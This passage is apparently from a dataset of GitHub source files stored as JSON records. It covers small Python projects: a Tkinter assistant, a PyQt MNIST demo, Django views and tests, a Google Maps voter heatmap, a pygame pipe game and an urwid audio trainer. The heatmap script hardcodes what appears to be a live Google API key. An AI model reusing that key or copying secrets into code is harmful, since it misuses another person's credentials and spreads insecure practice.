Virtual Assistant's name below\") \r\n enter_label.pack(pady=10) \r\n \r\n\r\n Name_label = Label(settings_screen, text = \"Name\")\r\n Name_label.pack(pady=10)\r\n \r\n name_entry = Entry(settings_screen, textvariable = name)\r\n name_entry.pack()\r\n\r\n\r\n change_name_button = Button(settings_screen, text = \"Ok\", width = 10, height = 1, command = change_name)\r\n change_name_button.pack(pady=10)\r\n\r\n\r\ndef info():\r\n info_screen = Toplevel(screen)\r\n info_screen.title(\"Info\")\r\n info_screen.iconbitmap('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/app_icon.ico')\r\n\r\n creator_label = Label(info_screen,text = \"Created by Bhavna\")\r\n creator_label.pack()\r\n\r\n Age_label = Label(info_screen, text= \"She lives in Bhopal\")\r\n Age_label.pack()\r\n\r\n for_label = Label(info_screen, text = \"She likes AI!\")\r\n for_label.pack()\r\n\r\nkeyboard.add_hotkey(\"enter\", run_alexa)\r\n\r\ndef wikipedia_screen(text):\r\n wikipedia_screen = Toplevel(screen)\r\n wikipedia_screen.title(text)\r\n wikipedia_screen.iconbitmap('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/app_icon.ico')\r\n\r\n message = Message(wikipedia_screen, text= text)\r\n message.pack()\r\n\r\ndef main_screen():\r\n global screen\r\n screen = Tk()\r\n screen.title(name_assistant)\r\n screen.geometry(\"300x400\")\r\n screen.iconbitmap('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/app_icon.ico')\r\n\r\n\r\n name_label = Label(text = name_assistant,width = 300, bg = \"black\", fg=\"white\", font = (\"Calibri\", 13))\r\n name_label.pack()\r\n\r\n microphone_photo = PhotoImage(file = 'C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/assistant_logo.png')\r\n microphone_button = Button(image=microphone_photo, command = run_alexa)\r\n microphone_button.pack(pady=10)\r\n\r\n settings_photo = PhotoImage(file = 'C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/settings.png')\r\n settings_button = Button(image=settings_photo, command = change_name_window)\r\n settings_button.pack(pady=10)\r\n \r\n info_button = Button(text =\"Info\", command = info)\r\n info_button.pack(pady=10)\r\n\r\n screen.mainloop()\r\nmain_screen()\r\n\r\n\r\n\r\n\r\n","repo_name":"ibhavna/Personal-Assistant","sub_path":"Virtual Assistant/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} 
+{"seq_id":"11518349583","text":"import json\nfrom BestNPCFinder import BestNPCFinder\n\nif __name__ == \"__main__\":\n npc_finder = BestNPCFinder('npcs.dat', 300, 1)\n\n best_exp_npcs = npc_finder.best_for_exp(20)\n best_gold_npcs = npc_finder.best_for_gold(3)\n best_total_npc = npc_finder.best_for_total(3)\n best_damage_npcs = npc_finder.best_for_damage(5)\n\n report = {\n 'best_exp_npcs': [npc.as_dict() for npc in best_exp_npcs],\n 'best_gold_npcs': [npc.as_dict() for npc in best_gold_npcs],\n 'best_total_npc': best_total_npc[0].as_dict(),\n 'best_damage_npcs': [npc.as_dict() for npc in best_damage_npcs],\n }\n\n report_json = json.dumps(report, indent=4)\n\n # Imprime el informe en formato JSON.\n print(report_json)\n\n # También puedes guardar el informe en un archivo\n with open('npc_report.json', 'w') as f:\n f.write(report_json)\n","repo_name":"maisonnat/pyBalance","sub_path":"game_helper.py","file_name":"game_helper.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71849807479","text":"#SFC project - CNN from scratch\n#Author: Jakub Svoboda \n#Date: 2019-10-26\n\n\nimport PyQt5\nfrom PyQt5 import QtGui\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt, QPoint\nfrom PyQt5.QtWidgets import QMainWindow, QApplication\nfrom PyQt5.QtGui import QPixmap, QPainter, QPen, QImage\nimport sys, os\nimport network\nimport numpy as np\nimport csv\n\nclass DrawArea(QLabel):\n\t#Encapsulates the display area widget and its functionality\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tpixmap = QPixmap()\n\t\tself.setPixmap(pixmap)\n\t\tself.resize(pixmap.width(),pixmap.height())\n\t\tself.update()\n\nclass Window(QWidget):\n\t#Encapsulates the main window and its functionality\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.setFixedSize(700, 300)\t#our window is not resizable\n\t\tself.setGeometry(00, 00, 700, 300)\n\t\tself.initNet()\t\t\t\t#load network\n\n\t\tlayout = QGridLayout()\n\t\tlayout.setVerticalSpacing(30)\n\t\tself.setLayout(layout)\n\n\t\tself.drawArea = DrawArea()\n\t\tlayout.addWidget(self.drawArea, 0, 0 , 3, 1)\t#add draw area\n\n\t\tself.clear = QPushButton(\"Select random number\")\n\t\tlayout.addWidget(self.clear, 0, 1, 1, 1)\t\t#add button\n\t\tself.clear.clicked.connect(self.onClickClear)\t#connect trigger\n\n\t\tself.classify = QPushButton(\"Classify\")\n\t\tself.classify.setDisabled(True)\n\t\tlayout.addWidget(self.classify, 1, 1, 1, 1)\t\t#add button\n\t\tself.classify.clicked.connect(self.onClickClassify) #connect trigger\n\n\t\tself.label_1 = QLabel(\"Predicted class: \")\t\t#add label\n\t\tself.label_1.setFont(QtGui.QFont(None, 15, QtGui.QFont.Normal))\n\t\tlayout.addWidget(self.label_1, 2, 1, 1, 1)\n\t\t\n\t\tself.loadSet()\t#load dataset\n\t\tself.show()\t\t#show window\n\n\tdef loadSet(self):\n\t\t#Loads the dataset into network- readable form\n\t\twith open(\"dataset/mnist-tk.inp\") as csv_file:\n\t\t\tcsv_reader = csv.reader(csv_file, delimiter=' ')\n\t\t\tlineCount = 0\n\t\t\tself.dataset = []\n\t\t\tself.labels = []\n\t\t\tfor row in csv_reader:\t\t#for each row\n\t\t\t\tdataInt = []\n\t\t\t\tfor idx, num in enumerate(row):\n\t\t\t\t\tif idx == 784:\t\t#end of data line\n\t\t\t\t\t\tbreak\n\t\t\t\t\tdataInt.append(int(num))\n\t\t\t\tdata = np.array(dataInt)\n\t\t\t\tdata = data.reshape((28,28))\n\t\t\t\tself.dataset.append(data)\n\t\t\t\tlabel = np.zeros((10,1))\n\t\t\t\tlabel[int(row[786])][0] = 1\n\t\t\t\tlabel = 
label.reshape(10,)\t#turns out (10,1) != (10,)\n\t\t\t\tself.labels.append(label) \t\t\n\t\t\t\tlineCount += 1\n\n\t\t\tself.dataset = np.array(self.dataset)\n\t\t\tself.showSet = self.dataset\n\t\t\tself.dataset = (self.dataset / 255) - 0.5 #normalize to (-0.5,0.5)\n\t\t\tself.labels = np.array(self.labels)\n\t\n\t\n\tdef onClickClassify(self):\n\t\tresult = self.myNet.predict(self.image)\t\t#predict on a single data point\n\t\tself.label_1.setText(\"Predicted class: \" + str(result))\n\n\tdef onClickClear(self):\n\t\tself.classify.setDisabled(False)\n\t\tself.r = np.random.randint(0, 9999)\n\t\tself.image = self.dataset[self.r]\n\t\tnum = None\n\t\tfolder = None\n\t\tif(self.r < 1000):\t\t\t#Select the correct folder where the image is stored\n\t\t\tfolder = \"00000-00999\"\t\n\t\telif(self.r < 2000):\n\t\t\tfolder = \"01000-01999\"\n\t\telif(self.r < 3000):\n\t\t\tfolder = \"02000-02999\"\n\t\telif(self.r < 4000):\n\t\t\tfolder = \"03000-03999\"\n\t\telif(self.r < 5000):\n\t\t\tfolder = \"04000-04999\"\n\t\telif(self.r < 6000):\n\t\t\tfolder = \"05000-05999\"\n\t\telif(self.r < 7000):\n\t\t\tfolder = \"06000-06999\"\n\t\telif(self.r < 8000):\n\t\t\tfolder = \"07000-07999\"\n\t\telif(self.r < 9000):\n\t\t\tfolder = \"08000-08999\"\n\t\telse:\n\t\t\tfolder = \"09000-09999\"\n\n\t\tif self.r < 10:\n\t\t\tnum = \"0000\" + str(self.r) + \"-\" + str(np.argmax(self.labels[self.r])) + \".gif\"\t\n\t\telif self.r\t< 100:\n\t\t\tnum = \"000\" + str(self.r) + \"-\" + str(np.argmax(self.labels[self.r])) + \".gif\"\t\n\t\telif self.r < 1000:\n\t\t\tnum = \"00\" + str(self.r) + \"-\" + str(np.argmax(self.labels[self.r])) + \".gif\"\t\n\t\telse:\n\t\t\tnum = \"0\" + str(self.r) + \"-\" + str(np.argmax(self.labels[self.r])) + \".gif\"\n\n\t\tpath = \tos.path.join(\"dataset\", \"t10k\", folder, num)\t#full path (os specific)\n\n\t\tpixmap = QPixmap(path)\t\t\t\t\t\t#display the number \n\t\tpixmap = pixmap.scaledToHeight(280)\n\t\tpixmap = pixmap.scaledToWidth(280)\n\t\tself.drawArea.setPixmap(pixmap)\n\t\tself.drawArea.resize(pixmap.width(),pixmap.height())\n\t\tself.drawArea.update()\n\t\t\t\t\n\n\tdef initNet(self):\n\t\t#loads the saved network from disk\n\t\tself.myNet = network.loadModel()\n\n\nif __name__ == '__main__':\n\tnp.random.seed(42)\n\tapp = QApplication(sys.argv)\n\twindow = Window()\n\t\n\tsys.exit(app.exec_())\n\t","repo_name":"Jakub-Svoboda/CNN-from-scratch","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13053293259","text":"import numpy as np\nfrom astropy.io import fits\nfrom hst_func import *\n\nworkdir = \"/Volumes/Spare Data/Hannah_Data/\"\ncatDir = \"matchForm/catDir/\"\n\n# Create list of images to be corrected\nimlist = [\"jdan03dpq\",\"jdan03drq\",\"jdan03dyq\",\"jdan03e3q\"]\n\n# Create corresponding list of filters (and offsets) to be applied to each image\nfilterlist = [\"F606W\", \"F606W\", \"F606W\", \"F606W\"]\n\noffsetlist = [20.0, 20.0, 20.0, 20.0] # This is in pixels/arcsec for ACS\n\n\n# Set indice ids to be used (xc, yc, xo, yo, id1 will all be created during this script)\nxr, yr, mag, id, xc, yc, xo, yo, id1 = 0, 1, 2, 3, 4, 5, 6, 7, 8\n\n\n# Set the pixel tolerance for matching sources together\n\nmatchtol = 1.0\n\nfor a in range(len(imlist)):\n\n## Load image\n tempim = fits.open(workdir+imlist[a]+\"_flc.fits\")\n xoff = float(tempim[0].header[\"POSTARG1\"])\n yoff = float(tempim[0].header[\"POSTARG2\"])\n\n\n## 
Load the respective catalog\n cat = np.loadtxt(workdir+catDir+imlist[a]+\"_ERIDANUS-III_F606W.dat\", comments=\"#\")\n\n## Apply offsets\n\n# Create an array for the new values\n newcol = np.zeros((len(cat),2))\n newcol[:,0] = cat[:,xc] - (offsetlist[a] * xoff)\n newcol[:,1] = cat[:,yc] - (offsetlist[a] * yoff)\n\n## Combine to single array and save out\n cat = np.hstack((cat, newcol))\n\n header = \"xr yr mag id xc yc xo yo\"\n np.savetxt(workdir +catDir+ imlist[a] + \"_offsetCor.dat\", cat, fmt=\"%1.5f\", header=header)\n","repo_name":"hrichstein/treasuryPipeline","sub_path":"erid-III-test.py","file_name":"erid-III-test.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3637825117","text":"from django.shortcuts import render\nfrom .models import Bb\n\n\ndef base(request):\n if request.POST:\n data_elements = []\n key = request.POST.get('field')\n value = request.POST.get('value').lower()\n for k in Bb.objects.all():\n if value in str(k.__getattribute__(key)).lower():\n data_elements.append(k)\n context = {'bb': data_elements}\n else:\n context = {'bb': Bb.objects.all().values('title', 'description', 'price', 'kind')}\n fields = {}\n for i in Bb._meta.fields:\n if i.name not in ('id', 'published'):\n fields[i.name] = i.verbose_name\n context['fields'] = zip(fields.keys(), fields.values())\n\n return render(request, 'bboard/base.html', context=context)\n","repo_name":"Girohirolook/django","sub_path":"bboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31300031164","text":"import pandas as pd\nimport googlemaps\nimport gmaps\n\nfrom GovExtraction import extractGovData\nfrom GoogleGeocodingApi import getLocationByPostalCode\nfrom ipywidgets.embed import embed_minimal_html\n\nAPI_KEY = \"AIzaSyB8xoaQ2tvLexzFIPbJQ0ttEHNCn1JYoHw\"\nlocations = {}\nlocations['lat'] = []\nlocations['lng'] = []\ntotal = []\n\ndef getLocationInfo():\n #Recupera os dados do site de eleitores na cidade de blumenau\n dataframe = extractGovData()\n addresses = dataframe['Endereço']\n postalCodes = dataframe['CEP']\n counts = dataframe['Total de Eleitores']\n for address, postalCode, count in zip(addresses, postalCodes, counts):\n #Através da API da google é recuperado a latitude e a longitude passando cep e endereço\n location = getLocationByPostalCode(str(postalCode) + ',' + address)\n locations['lat'].append(location.get('lat'))\n locations['lng'].append(location.get('lng'))\n total.append(count)\n\ndef drawHeatMap(zoom, intensity, radius):\n #Configuração da API do google\n gm = googlemaps.Client(key=API_KEY)\n gmaps.configure(api_key=API_KEY)\n #Utilizando o googlemaps é definido a visualização inicial do mapa de calor\n geocode_result = gm.geocode('Blumenau')[0]\n #Gera o mapa de calor a partir da latitude, longitude e a quantidade utilizando o gmaps\n center_lat=geocode_result['geometry']['location']['lat']\n center_lng=geocode_result['geometry']['location']['lng']\n heatmap_layer = gmaps.heatmap_layer(pd.DataFrame(locations), pd.DataFrame(total), dissipating = True)\n heatmap_layer.max_intensity = intensity\n heatmap_layer.point_radius = radius\n fig = gmaps.figure()\n fig = gmaps.figure(center = [center_lat,center_lng], zoom_level=zoom)\n fig.add_layer(heatmap_layer)\n #Exporta o mapa para um html, onde ao acessar é possível realzar o download em png\n 
embed_minimal_html('c:/temp/export.html', views=[fig])\n\ndef main():\n #Popular informações dos eleitores\n getLocationInfo()\n #Gerar o mapa de calor\n drawHeatMap(10, 5, 15)\n \nif __name__ == \"__main__\":\n main()","repo_name":"Urahaa/python-projects","sub_path":"HeatMap/HeatMapGenerator.py","file_name":"HeatMapGenerator.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12861507021","text":"import pygame\n\nimport clock\nimport Game\n\nfrom GameObjects import PipeType\n\nclass Flow(object):\n def __init__(self, starting_x, starting_y, flowtime):\n\n self.starting_x = starting_x\n self.starting_y = starting_y\n self.flowtime = flowtime\n self.clock = clock.Clock()\n self.is_flowing = False\n self.x = self.starting_x\n self.y = self.starting_y\n\n\n def update(self, map, game):\n\n\n\n\n if not self.is_flowing:\n if (self.clock.elapsed() > 15000):\n\n self.clock.restart()\n self.is_flowing = True\n else:\n if(self.clock.elapsed() > self.flowtime):\n\n self.clock.restart()\n if (self.push_water(map) == False):\n game.stance.append(Game.GAME.GAMEOVER)\n\n self.gameover = True\n elif (self.x, self.y) == (map.cols -1, map.rows -1):\n game.stance.append(Game.GAME.WIN)\n self.change_image(map.get_pipe((map.cols -1, map.rows -1)))\n pygame.time.delay(5000)\n print(\"winner\")\n self.win = True\n self.is_flowing = False\n\n\n\n\n\n\n\n\n def push_water(self, map):\n\n up = (self.x,self.y-1)\n right = (self.x + 1,self.y)\n down = (self.x,self.y+1)\n left = (self.x - 1,self.y)\n current = (self.x, self.y)\n\n\n if map.correct_index(down) and self.flow_possible(map.get_pipe(current), map.get_pipe(down), 2):\n map.get_pipe(current).sequence[2] = 2\n map.get_pipe(down).sequence[0] = 2\n self.change_image(map.get_pipe(current))\n self.y += 1\n\n\n return True\n elif map.correct_index(right) and self.flow_possible(map.get_pipe(current), map.get_pipe(right), 1):\n map.get_pipe(current).sequence[1] = 2\n map.get_pipe(right).sequence[3] = 2\n self.change_image(map.get_pipe(current))\n self.x += 1\n return True\n\n elif map.correct_index(left) and self.flow_possible(map.get_pipe(current), map.get_pipe(left), 3):\n map.get_pipe(current).sequence[3] = 2\n map.get_pipe(left).sequence[1] = 2\n self.change_image(map.get_pipe(current))\n\n self.x -= 1\n return True\n elif map.correct_index(up) and self.flow_possible(map.get_pipe(current), map.get_pipe(up),0):\n map.get_pipe(current).sequence[0] = 2\n map.get_pipe(up).sequence[2] = 2\n self.change_image(map.get_pipe(current))\n\n self.y -= 1\n return True\n return False\n\n def change_image(self,pipe):\n if pipe.type == PipeType.STRAIGHT:\n pipe.type = PipeType.STRWATER\n elif pipe.type == PipeType.CORNER:\n pipe.type = PipeType.CORWATER\n\n def dry_pipe(self,map):\n for pipe in map:\n if pipe.type == PipeType.STRWATER:\n pipe.type = PipeType.STRAIGHT\n elif pipe.type == PipeType.CORWATER:\n pipe.type = PipeType.CORNER\n\n\n\n def flow_possible(self, pipe_out, pipe_in, direction):\n if direction == 0:\n if pipe_out.sequence[0] == pipe_in.sequence[2] == 1:\n return True\n else:\n return False\n if direction == 1:\n if pipe_out.sequence[1] == pipe_in.sequence[3] == 1:\n return True\n else:\n return False\n if direction == 2:\n if pipe_out.sequence[2] == pipe_in.sequence[0] == 1:\n return True\n else:\n return False\n if direction == 3:\n if pipe_out.sequence[3] == pipe_in.sequence[1] == 1:\n return True\n else:\n return False\n\n def reset(self, map_): 
#funkcja restartujaca mape, przepływ wody -> po kliknięciu Nowa gra\n self.clock.restart()\n self.x = self.starting_x\n self.y = self.starting_y\n self.is_flowing = False\n for pipe in map_:\n for i in range(4):\n if pipe.sequence[i] == 2:\n pipe.sequence[i] = 1\n\n\n","repo_name":"marikapartyka/Plumber","sub_path":"flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35059550960","text":"from unittest.mock import MagicMock\n\nfrom django.contrib.admin.models import LogEntry\n\nfrom elk.utils.testing import TestCase, create_customer, create_teacher\nfrom lessons import models as lessons\nfrom market import signals\nfrom market.models import Class, Subscription\nfrom products.models import Product1\n\n\nclass TestSubscriptionSignals(TestCase):\n fixtures = ('lessons', 'products')\n\n def setUp(self):\n self.customer = create_customer()\n self.subscription = Subscription(\n customer=self.customer,\n product=Product1.objects.get(pk=1),\n buy_price=150,\n )\n self.deactivator = create_customer().user\n\n def test_deactivation_signal_is_beeing_sent(self):\n handler = MagicMock()\n signals.subscription_deactivated.connect(handler)\n self.subscription.deactivate()\n self.assertEqual(handler.call_count, 1)\n\n def test_log_entry_creation(self):\n self.subscription.deactivate(user=self.deactivator)\n\n log_entry = LogEntry.objects.first()\n self.assertEqual(log_entry.user, self.deactivator)\n self.assertIn('deactivated', log_entry.change_message)\n\n\nclass TestClassSignals(TestCase):\n fixtures = ['lessons']\n\n def setUp(self):\n self.customer = create_customer()\n self.teacher = create_teacher(works_24x7=True)\n self.lesson = lessons.OrdinaryLesson.get_contenttype()\n\n def _buy_a_lesson(self):\n c = Class(\n customer=self.customer,\n lesson_type=self.lesson\n )\n c.save()\n return c\n\n def _schedule(self, c):\n c.schedule(\n teacher=self.teacher,\n date=self.tzdatetime(2032, 12, 1, 11, 30),\n allow_besides_working_hours=True,\n )\n c.save()\n c.refresh_from_db()\n self.assertTrue(c.is_scheduled)\n return c\n\n def test_scheduled_signal_is_beeing_sent(self):\n handler = MagicMock()\n c = self._buy_a_lesson()\n signals.class_scheduled.connect(handler)\n self._schedule(c)\n self.assertEqual(handler.call_count, 1)\n\n def test_scheduled_class_signal_called_once(self):\n handler = MagicMock()\n c = self._buy_a_lesson()\n signals.class_scheduled.connect(handler)\n self._schedule(c)\n self.assertEqual(handler.call_count, 1)\n\n for i in range(0, 5):\n c.save()\n\n self.assertEqual(handler.call_count, 1) # signal should be saved only once\n\n def test_cancellation_signal_is_beeing_sent(self):\n c = self._buy_a_lesson()\n self._schedule(c)\n handler = MagicMock()\n signals.class_cancelled.connect(handler)\n c.cancel()\n self.assertEqual(handler.call_count, 1)\n","repo_name":"die-trying/django-celery","sub_path":"market/tests/unit/tests_signals.py","file_name":"tests_signals.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"40"} +{"seq_id":"23508639916","text":"import numpy as np\nimport cv2\n\n\ndef bilinear_interpolation(img, input):\n src_height, src_width, channel = img.shape\n print('src_height:', src_height, 'src_width:', src_width, 'channel:', channel)\n new_height, new_width = input[1],input[0]\n print('new_height:', new_height, 'new_width:', new_width)\n if src_height == 
new_height and src_width == new_width:\n return img.copy()\n\n new_img = np.zeros((new_height, new_width, 3), dtype=img.dtype)\n s_height, s_width = float (src_height) / new_height, float (src_width) / new_width\n\n for i in range(channel):\n for cur_height in range(new_height):\n for cur_width in range(new_width):\n src_x = (cur_width + 0.5) * s_width - 0.5\n src_y = (cur_height + 0.5) * s_height - 0.5\n\n src_x0 = int(np.floor(src_x))\n src_x1 = min(src_x0 + 1, src_width - 1)\n src_y0 = int(np.floor(src_y))\n src_y1 = min(src_y0 + 1, src_height - 1)\n\n point0 = (src_x1 - src_x) * img[src_y0, src_x0, i] + (src_x - src_x0) * img[src_y0, src_x1, i]\n point1 = (src_x1 - src_x) * img[src_y1, src_x0, i] + (src_x - src_x0) * img[src_y1, src_x1, i]\n new_img[cur_height, cur_width, i] = int((src_y1 - src_y) * point0 + (src_y - src_y0) * point1)\n return new_img\n\n\nif __name__ == '__main__':\n img = cv2.imread('lenna.png')\n dst = bilinear_interpolation(img, (900, 900))\n cv2.imshow('bilinear interp', dst)\n cv2.waitKey()\n","repo_name":"OMG1-1/badou-ai-special-2023","sub_path":"105-罗浩华-深圳/第二周/bilinear_interpolation.py","file_name":"bilinear_interpolation.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"17987436523","text":"from pickle import load\nimport matplotlib as mpl\nimport matplotlib.animation as animation\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\nwith open(\"AnimationData.pickle\", 'rb') as handle:\n lists = load(handle)\nparameters, timeframes = lists\n\"\"\"\nparameters contains all information about the simulation needed to make animation.\ntimeframes[0] = xpos, ypos, valE, \nwhere xpos, ypos give the positions of each electron, \nand valE give the values of external E field where sampled\n\"\"\"\n\nxmin, xmax, ymin, ymax, xposE = parameters\nmpl.rcParams['savefig.facecolor'] = 'white'\nfig, ax = plt.subplots()\noffset = 0\n\n\ndef animate(frame_nb):\n frame = timeframes[frame_nb]\n xpos, ypos, valE = frame\n valE = np.array(valE)\n ax.clear()\n ax.set_xlim(xmin-offset,xmax+offset)\n ax.set_ylim(ymin-offset,ymax+offset)\n ax.set_xlabel(\"X [µm]\")\n ax.set_ylabel(\"Y [µm]\")\n ax.scatter(xpos, ypos,color=\"black\",s=5, zorder=200)\n if not np.all(valE == 0):\n ax.set_title(\"External field: up = blue, down = red\")\n plus = valE > 0\n minus = valE < 0\n plt.scatter(xposE[plus],0*xposE[plus],color=\"blue\")\n plt.scatter(xposE[minus],0*xposE[minus],color=\"red\")\n\n\nprint(\"Starting animation compilation\")\nanime = animation.FuncAnimation(fig, animate, frames=len(timeframes), interval=1)\nanime.save(\"(To rename) Electron dynamics.gif\", writer='pillow')\nprint(\"Animation saved successfully\")","repo_name":"Illuminati2126/Project-PHYS512","sub_path":"Animation.py","file_name":"Animation.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5984376604","text":"\"\"\"Main training app.\"\"\"\nfrom __future__ import unicode_literals, print_function\nimport os\nimport sys\nfrom argparse import ArgumentParser\n\nimport urwid\nimport librosa\nimport numpy as np\nimport tables as tb\n\nimport umdone.io\nfrom umdone import cli\nfrom umdone import dtw\nfrom umdone import sound\nfrom umdone import segment\n\n\nclass TrainerModel(object):\n\n max_val = 1\n min_val = -1\n valid_categories = (\n (0, 'word'),\n (1, 'ummm'),\n (2, 'like'),\n (3, 'other non-word'),\n )\n\n def 
__init__(self, fname, window_length=0.05, threshold=0.01, n_mfcc=13):\n # settings\n self.filename = fname\n self.window_length = window_length\n self.threshold = threshold\n self.n_mfcc = n_mfcc\n\n # data\n self.current_segment = 0\n self.raw, self.sr = librosa.load(fname, mono=True, sr=None)\n self.bounds = segment.boundaries(self.raw, self.sr, window_length=window_length, \n threshold=threshold)\n self.nsegments = len(self.bounds)\n self.runtime = len(self.raw) / self.sr\n\n # results, keyed by current segement\n self.categories = {}\n\n @property\n def clip(self):\n l, u = self.bounds[self.current_segment]\n return self.raw[l:u]\n\n def segement_order(self):\n return sorted(self.categories.keys())\n\n def compute_mfccs(self, callback=None):\n sr = self.sr\n n_mfcc = self.n_mfcc\n n = len(self.categories)\n self.mfccs = mfccs = []\n order = self.segement_order()\n for status, seg in enumerate(order, start=1):\n l, u = self.bounds[seg]\n clip = self.raw[l:u]\n mfcc = librosa.feature.mfcc(clip, sr, n_mfcc=n_mfcc).T\n mfccs.append(mfcc)\n if callback is not None:\n callback(status/n)\n return mfccs\n\n def compute_distances(self, outfile, callback=None):\n mfccs = self.mfccs\n if os.path.isfile(outfile):\n mfccs = umdone.io._load_mfccs(outfile) + mfccs\n self.distances = dtw.distance_matrix(mfccs, callback=callback)\n return self.distances\n\n def save(self, outfile):\n order = self.segement_order()\n cats = [self.categories[seg] for seg in order]\n umdone.io.save(outfile, self.mfccs, cats, distances=self.distances)\n\n\nclass TrainerView(urwid.WidgetWrap):\n \"\"\"\n A class responsible for providing the application's interface and\n graph display.\n \"\"\"\n palette = [\n ('body', 'black', 'light gray', 'standout'),\n ('header', 'white', 'dark red', 'bold'),\n ('screen edge', 'light blue', 'dark cyan'),\n ('main shadow', 'dark gray', 'black'),\n ('line', 'black', 'light gray', 'standout'),\n ('bg background','light gray', 'black'),\n ('bg 1', 'black', 'dark blue', 'standout'),\n ('bg 1 smooth', 'dark magenta', 'black'),\n ('bg 2', 'black', 'dark cyan', 'standout'),\n ('bg 2 smooth', 'dark cyan', 'black'),\n ('button normal','light gray', 'dark blue', 'standout'),\n ('button select','white', 'dark green'),\n ('line', 'black', 'light gray', 'standout'),\n ('pg normal', 'white', 'black', 'standout'),\n ('pg complete', 'white', 'dark magenta'),\n ('pg smooth', 'dark magenta','black'),\n ]\n\n graph_num_bars = 100\n\n def __init__(self, controller):\n self.controller = controller\n self.status = urwid.Text(\"Status\")\n super(TrainerView, self).__init__(self.main_window())\n\n def update_graph(self):\n nbars = self.graph_num_bars\n d = np.abs(self.controller.model.clip)\n win_size = int(len(d) / nbars)\n d = d[:win_size*nbars]\n d.shape = (nbars, win_size)\n d = d.sum(axis=1)\n l = []\n max_value = d.max()\n for n, value in enumerate(d): # toggle between two bar colors\n if n & 1:\n l.append([0, value])\n else:\n l.append([value, 0])\n self.graph.set_data(l, max_value)\n\n def update_status(self):\n model = self.controller.model\n if model.current_segment in model.categories:\n c = model.valid_categories[model.categories[model.current_segment]][1]\n c = 'Categorized as ' + c\n else:\n c = 'Uncategorized'\n s = (\"Clip {0} of {1}\\n\"\n \"Duration {2:.3} sec\\n\"\n \"{3}\"\n ).format(model.current_segment + 1, model.nsegments, \n len(model.clip) / model.sr, c)\n self.status.set_text(s)\n\n def update_progress(self):\n model = self.controller.model\n 
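# editor note (comment added; not in the original file): the bar was created with\n # done=runtime seconds, so completion is the current segment's start sample divided\n # by the sample rate, i.e. the playhead position in seconds.\n 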
self.progress.set_completion(model.bounds[model.current_segment][0]/model.sr)\n\n def update_segment(self):\n self.update_graph()\n self.update_status()\n self.update_progress()\n\n def on_nav_button(self, button, offset):\n self.controller.offset_current_segment(offset)\n\n def on_cat_button(self, button, i):\n self.controller.select_category(i)\n\n def on_unicode_checkbox(self, w, state):\n self.graph = self.bar_graph(state)\n self.graph_wrap._w = self.graph\n self.update_graph()\n\n def main_shadow(self, w):\n \"\"\"Wrap a shadow and background around widget w.\"\"\"\n bg = urwid.AttrWrap(urwid.SolidFill(\"\\u2592\"), 'screen edge')\n shadow = urwid.AttrWrap(urwid.SolidFill(\" \"), 'main shadow')\n bg = urwid.Overlay(shadow, bg,\n ('fixed left', 3), ('fixed right', 1),\n ('fixed top', 2), ('fixed bottom', 1))\n w = urwid.Overlay(w, bg,\n ('fixed left', 2), ('fixed right', 3),\n ('fixed top', 1), ('fixed bottom', 2))\n return w\n\n def bar_graph(self, smooth=False):\n satt = None\n if smooth:\n satt = {(1,0): 'bg 1 smooth', (2,0): 'bg 2 smooth'}\n w = urwid.BarGraph(['bg background', 'bg 1', 'bg 2'], satt=satt)\n return w\n\n def button(self, t, fn, *args, **kwargs):\n w = urwid.Button(t, fn, *args, **kwargs)\n w = urwid.AttrWrap(w, 'button normal', 'button select')\n return w\n\n def progress_bar(self, done=1, smooth=False):\n if smooth:\n return urwid.ProgressBar('pg normal', 'pg complete', 0, done, 'pg smooth')\n else:\n return urwid.ProgressBar('pg normal', 'pg complete', 0, done)\n\n def save_and_exit_program(self, w):\n # replace progress bar\n self.progress = self.progress_bar(done=1.0)\n self.progress_wrap._w = self.progress\n # save and exit\n self.controller.save()\n self.exit_program(w)\n\n def exit_program(self, w):\n raise urwid.ExitMainLoop()\n\n def graph_controls(self):\n # setup category buttons\n vc = self.controller.model.valid_categories\n self.category_buttons = [self.button(cat, self.on_cat_button, i) \n for i, cat in vc]\n # setup animate button\n nav_controls = urwid.GridFlow([\n self.button(\" prev \", self.on_nav_button, -1),\n self.button(\"replay\", self.on_nav_button, 0),\n self.button(\" next \", self.on_nav_button, 1),\n ], 10, 3, 0, 'center')\n\n self.progress = self.progress_bar(done=self.controller.model.runtime)\n self.progress_wrap = urwid.WidgetWrap(self.progress)\n\n l = [urwid.Text(\"Categories\", align=\"center\")]\n l += self.category_buttons\n l += [urwid.Divider(),\n urwid.Text(\"Navigation\", align=\"center\"),\n nav_controls,\n 